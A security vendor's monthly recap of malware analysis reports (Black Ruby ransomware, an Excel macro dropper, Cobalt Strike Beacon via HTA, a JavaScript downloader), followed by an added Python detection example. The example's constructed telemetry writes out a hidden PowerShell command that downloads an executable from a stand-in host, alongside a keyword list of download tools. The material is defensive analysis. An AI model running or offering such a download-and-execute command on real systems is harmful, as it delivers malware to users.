VMRay Malware Analysis Report Recap – February 2018

Welcome to the VMRay Malware Analysis Report Recap. Every month our Research Team provides a recap of the malware analysis reports posted to the VMRay Twitter account. This past February, our team analyzed Black Ruby ransomware, Cobalt Strike Beacon and a JavaScript file attempting to detect VMs via the registry.


Report Name: Black Ruby Ransomware

Date Released: February 6, 2018

The Black Ruby ransomware was discovered in February 2018 by the MalwareHunterTeam.

For some malware authors, one attack type isn’t enough. Black Ruby includes a bonus cryptominer in addition to its standard ransomware capabilities. Not only does this malware encrypt the user’s files and demand a ransom but it also deploys a coin mining module to generate digital cryptocurrency.

Black Ruby’s capabilities are easy to identify from the function log (Figure 1).

Figure 1: VMRay function log detailing Black Ruby’s behavior

Another observation is that Black Ruby will only encrypt a user’s machine if the user is not in Iran. The ransomware does this by checking the machine’s IP address to determine the user’s location.

Figure 2: Threat Indicators (VTI) associated with Black Ruby ransomware

To make matters worse, Black Ruby adds the cryptominer to the startup routine for persistence, as is indicated in the list of Threat Indicators (Figure 2).

Report Name: Excel File Drops Malicious Payload

Date Released: February 13, 2018

This is a classic case of ‘VBA macro in a Microsoft Office document’. This malware sample downloads the payload via a macro script inside Excel and executes it.

The embedded VBA code can also be seen in the analysis report without the need for a separate local extraction.

Figure 3: VBA code embedded in the Excel document submitted for analysis

In the VTI section of the analysis report, the VTI rule “Download File” reveals the malicious payload “val.exe” was downloaded and renamed to “heidi.exe” (Figure 4).

Figure 4: Threat Indicators (VTI) associated with the malicious Excel file

In addition, the Network tab indicates that the contacted host is already blacklisted and is based in Malaysia (Figure 5).

Figure 5: Network activity involving blacklisted hosts and URLs

Report Name: Cobalt Strike Beacon dropped by HTML Application (HTA)

Date Released: February 15, 2018

HTML Applications (HTA files) are not often used to deliver malware. In this case, the HTA file is used to download and execute a malicious payload.

The interesting part is the payload itself. It is a JavaScript file that injects into and modifies the code of the “explorer.exe” process. As a result, “explorer.exe” then injects into and modifies the code of “rundll32.exe” to place a trojan on the system, as seen in the monitored processes in Figure 6.

Figure 6: Process graph for Cobalt Strike Beacon

Figure 7: Threat Indicators (VTI) associated with Cobalt Strike Beacon

Report Name: JavaScript Attempts to Detect VMs via Registry

Date Released: February 28, 2018

This sample represents one of the most common techniques used by malware authors: a JavaScript file that downloads and executes a malicious payload. In this case, the JavaScript starts the command prompt, which runs PowerShell, which in turn downloads and executes the payload. This can be seen clearly in the process graph included in the Overview section of the analysis report.

Figure 8: Process graph associated with the malware behavior

Once downloaded, the malicious payload “roamingeox20.exe” is executed and is added to the startup routine.

Figure 9: Threat indicators (VTI): addition of the malicious payload to the system startup routine for persistence
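The two behaviors this last report highlights, the script host → cmd.exe → PowerShell download chain and the payload registering itself in the startup routine, are exactly what endpoint telemetry lets a defender alert on. The following is an added detection example, not VMRay’s code or anything from the report: the event records are constructed, and their field names (pid, ppid, image, cmd, target, details) are an assumption that loosely mirrors process-creation and registry-value-set events from an EDR or Sysmon-style sensor.

```python
"""Added example: flag a script host -> cmd.exe -> PowerShell download chain
and a Run-key persistence write in constructed endpoint telemetry."""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "net.webclient", "bitsadmin")
RUN_KEY = "\\currentversion\\run"   # matches both Run and RunOnce

# Constructed process-creation events (field names are an assumption).
PROC_EVENTS = [
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\Downloads\invoice.js"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c powershell ..."},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -w hidden -nop -c (New-Object Net.WebClient).DownloadFile("
            r"'http://example.invalid/p.exe','C:\Users\u\AppData\Roaming\roamingeox20.exe')"},
]
# Constructed registry value-set events; the Run value mirrors the report's payload name.
REG_EVENTS = [
    {"pid": 400, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\roamingeox20",
     "details": r"C:\Users\u\AppData\Roaming\roamingeox20.exe"},
    {"pid": 100, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "details": "DWORD (0x00000001)"},
]

def basename(image):
    """Lower-cased file name of an image path, tolerating either slash style."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()

def find_download_chains(events):
    """Return (script_host_pid, powershell_pid) for each PowerShell process whose
    command line carries a download marker, whose parent is cmd.exe and whose
    grandparent is a script host, i.e. the chain in the report's process graph."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "powershell.exe" or not any(
                m in e["cmd"].lower() for m in DOWNLOAD_MARKERS):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) != "cmd.exe":
            continue
        grand = by_pid.get(parent["ppid"])
        if grand is not None and basename(grand["image"]) in SCRIPT_HOSTS:
            hits.append((grand["pid"], e["pid"]))
    return hits

def find_run_key_persistence(reg_events):
    """Return (value path, data) for every value written under a Run/RunOnce key."""
    return [(r["target"], r["details"]) for r in reg_events
            if RUN_KEY in r["target"].lower()]
```

Correlating the two results on the payload path written to the Run key (here `roamingeox20.exe`) ties the persistence write back to the download chain that produced it.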